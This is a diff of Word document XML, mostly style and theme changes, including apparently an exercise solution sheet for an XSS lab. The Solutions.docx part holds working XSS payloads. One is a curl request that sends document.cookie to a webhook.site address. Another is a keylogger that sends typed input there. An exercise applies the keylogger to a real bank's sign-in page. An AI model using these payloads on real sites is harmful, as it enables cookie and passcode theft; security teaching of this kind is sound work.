-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Smart Link" w:semiHidden="1" w:unhideWhenUsed="1"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="39" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -2087,6 +1603,7 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+    <w:qFormat/>
     <w:tblPr>
       <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblCellMar>
@@ -2125,7 +1642,7 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="UnresolvedMention">
+  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
     <w:name w:val="Unresolved Mention"/>
     <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
@@ -2600,6 +2117,36 @@
     <w:rPr>
       <w:color w:val="957A99" w:themeColor="followedHyperlink"/>
       <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="BalloonText">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="BalloonTextChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="004E22E0"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
+    <w:name w:val="Balloon Text Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="BalloonText"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="004E22E0"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+      <w:sz w:val="16"/>
+      <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -2648,12 +2195,12 @@
     </a:clrScheme>
     <a:fontScheme name="Crop">
       <a:majorFont>
-        <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204"/>
+        <a:latin typeface="Franklin Gothic Book"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
       </a:majorFont>
       <a:minorFont>
-        <a:latin typeface="Franklin Gothic Book" panose="020B0503020102020204"/>
+        <a:latin typeface="Franklin Gothic Book"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
       </a:minorFont>
@@ -2797,7 +2344,7 @@
   <a:extraClrSchemeLst/>
   <a:extLst>
     <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
-      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Crop" id="{EC9488ED-E761-4D60-9AC4-764D1FE2C171}" vid="{CE19780C-D67D-4C13-9DE9-A52BC3BA51B4}"/>
+      <thm15:themeFamily xmlns="" xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Crop" id="{EC9488ED-E761-4D60-9AC4-764D1FE2C171}" vid="{CE19780C-D67D-4C13-9DE9-A52BC3BA51B4}"/>
     </a:ext>
   </a:extLst>
 </a:theme>

--- a/Solutions.docx
+++ b/Solutions.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
   <w:background w:color="FFFFFF" w:themeColor="background1"/>
   <w:body>
     <w:p>
@@ -45,8 +45,13 @@
         <w:spacing w:line="360" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:t>In simplexssfiltering</w:t>
-      </w:r>
+        <w:t xml:space="preserve">In </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>simplexssfiltering</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
@@ -105,7 +110,15 @@
         <w:t>3</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">.b in simplestoredxss. Why doesn’t it work? Can you </w:t>
+        <w:t xml:space="preserve">.b in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>simplestoredxss</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">. Why doesn’t it work? Can you </w:t>
       </w:r>
       <w:r>
         <w:t>find a payload that works</w:t>
@@ -130,7 +143,21 @@
         <w:rPr>
           <w:color w:val="00B050"/>
         </w:rPr>
-        <w:t>curl 'http://localhost:5000/users/create/moshe%3Cbody%20onload=open(%22https:\\webhook.site\b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9%3fa%22+document.cookie)%3E'</w:t>
+        <w:t>curl '</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>http://localhost:5000/users/create/moshe%3Cbody%20onload=open(%22https:\\webhook.site\b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9%3fa%22+document.cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="00B050"/>
+        </w:rPr>
+        <w:t>)%3E'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -159,13 +186,20 @@
         <w:t>Bank of America</w:t>
       </w:r>
       <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
         <w:t>sign-in</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> page. Use the dev console to write XSS payload that implements keylogger</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> to steal the passcode</w:t>
+        <w:t xml:space="preserve"> to steal the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>passcode</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
@@ -175,7 +209,14 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://www.bankofamerica.com/</w:t>
+          <w:t>https</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>://www.bankofamerica.com/</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -189,7 +230,7 @@
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3941F2" wp14:editId="45A39FA1">
             <wp:extent cx="5943600" cy="858520"/>
             <wp:effectExtent l="0" t="0" r="0" b="5080"/>
             <wp:docPr id="1" name="Picture 1" descr="A picture containing graphical user interface&#10;&#10;Description automatically generated"/>
@@ -240,7 +281,14 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Solution in local</w:t>
+        <w:t xml:space="preserve">Solution in </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>local</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -255,7 +303,11 @@
         <w:t>:</w:t>
       </w:r>
       <w:r>
-        <w:t>http://localhost:5000/%3Cinput%20name=aaa%3E%3Cscript%3Edocument.getElementsByName(%22aaa%22)[0].addEventListener(%22keyup%22,%20function()%7B%20var%20xhttp%20=%20new%20XMLHttpRequest();%20xhttp.onreadystatechange%20=%20function()%20%7B%20if%20(true)%20%7B%20return;%20%7D%20%7D;%20xhttp.open(%22GET%22,%20%22https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a=%22+document.getElementsByName(%22aaa%22)[0].value,%20true);%20xhttp.send();%20});%3C/script%3E</w:t>
+        <w:t>http://localhost:5000/%3Cinput%20name=aaa%3E%3Cscript%3Edocument.getElementsByName(%22aaa%22</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>)[0].addEventListener(%22keyup%22,%20function()%7B%20var%20xhttp%20=%20new%20XMLHttpRequest();%20xhttp.onreadystatechange%20=%20function()%20%7B%20if%20(true)%20%7B%20return;%20%7D%20%7D;%20xhttp.open(%22GET%22,%20%22https://webhook.site/b9be4275-fa6b-44ce-8a7b-fe7ec5ad20c9?a=%22+document.getElementsByName(%22aaa%22)[0].value,%20true);%20xhttp.send();%20});%3C/script%3E</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -264,31 +316,69 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Solution in bankofamerica</w:t>
-      </w:r>
-    </w:p>
